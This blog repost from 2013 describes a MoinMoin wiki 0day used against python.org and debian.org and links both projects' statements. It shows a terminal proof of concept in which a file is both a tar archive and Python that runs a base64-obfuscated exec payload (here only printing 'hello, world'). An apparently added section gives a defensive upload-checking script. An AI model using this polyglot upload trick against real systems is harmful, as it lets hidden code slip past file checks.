CWYAlpha

Just another WordPress.com site

Thought this was cool: a MoinMoin wiki 0day that pwned python.org, then debian.org.



Python's statement

http://pyfound.blogspot.com/2013/01/wikipythonorg-compromised.html

Debian's statement

http://lists.debian.org/debian-devel-announce/2013/01/msg00000.html

$ touch "exec __import__('base64').b64decode('cHJpbnQgImhlbGxvLCB3b3JsZCI=')"            
$ tar cf result.py !$
tar cf result.py "exec __import__('base64').b64decode('cHJpbnQgImhlbGxvLCB3b3JsZCI=')"
$ python result.py 
hello, world
$ tar xvf result.py
x exec __import__('base64').b64decode('cHJpbnQgImhlbGxvLCB3b3JsZCI=')
$ 

This is the PoC for the 0day....

Put simply, it is an upload that is both a valid tar file and valid Python code. OMG, mind-blowing.
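A tar archive stores the first member's name in the first bytes of the file, which is why the file in the session above begins with Python source. The following is an added example, not code from the original post or from MoinMoin: an upload check that confirms the blob parses as a tar and then rejects any member whose name falls outside an allowlist. The `SAFE_NAME` policy and all function names are assumptions, and the sample archives are constructed in memory.

```python
import io
import re
import tarfile

# Member name copied from the terminal session on this page.
POC_NAME = "exec __import__('base64').b64decode('cHJpbnQgImhlbGxvLCB3b3JsZCI=')"

# Assumed policy: plain file names only (no spaces, quotes, parentheses or path separators).
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,99}")


def make_tar(names):
    """Build an in-memory ustar archive with one empty member per name (constructed sample)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tf:
        for name in names:
            tf.addfile(tarfile.TarInfo(name))
    return buf.getvalue()


def leading_text(blob):
    """Bytes before the first NUL; in a ustar file this is the first member's name."""
    return blob.split(b"\0", 1)[0].decode("latin-1")


def rejected_members(blob):
    """Return member names that fail the allowlist; raise ValueError if blob is not a tar."""
    try:
        # "r:" accepts only an uncompressed tar, so gzip/bzip2 wrappers are refused too.
        with tarfile.open(fileobj=io.BytesIO(blob), mode="r:") as tf:
            names = tf.getnames()
    except tarfile.TarError as exc:
        raise ValueError("not a tar archive") from exc
    return [name for name in names if not SAFE_NAME.fullmatch(name)]


if __name__ == "__main__":
    poc = make_tar([POC_NAME])
    print("file starts with:", leading_text(poc))
    print("rejected:", rejected_members(poc))
    print("rejected:", rejected_members(make_tar(["notes.txt", "../evil.py"])))
```

Passing a "valid tar" check says nothing about what else the bytes can be read as, so the name allowlist belongs alongside storing uploads where no interpreter will load them.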

Ruby on Rails got pwned today too.

So when is it Django's turn?

via 1, 2, 3

from est's blog: http://blog.est.im/post/40066246146

Written by cwyalpha

January 9, 2013 at 7:52 AM

Posted in Uncategorized
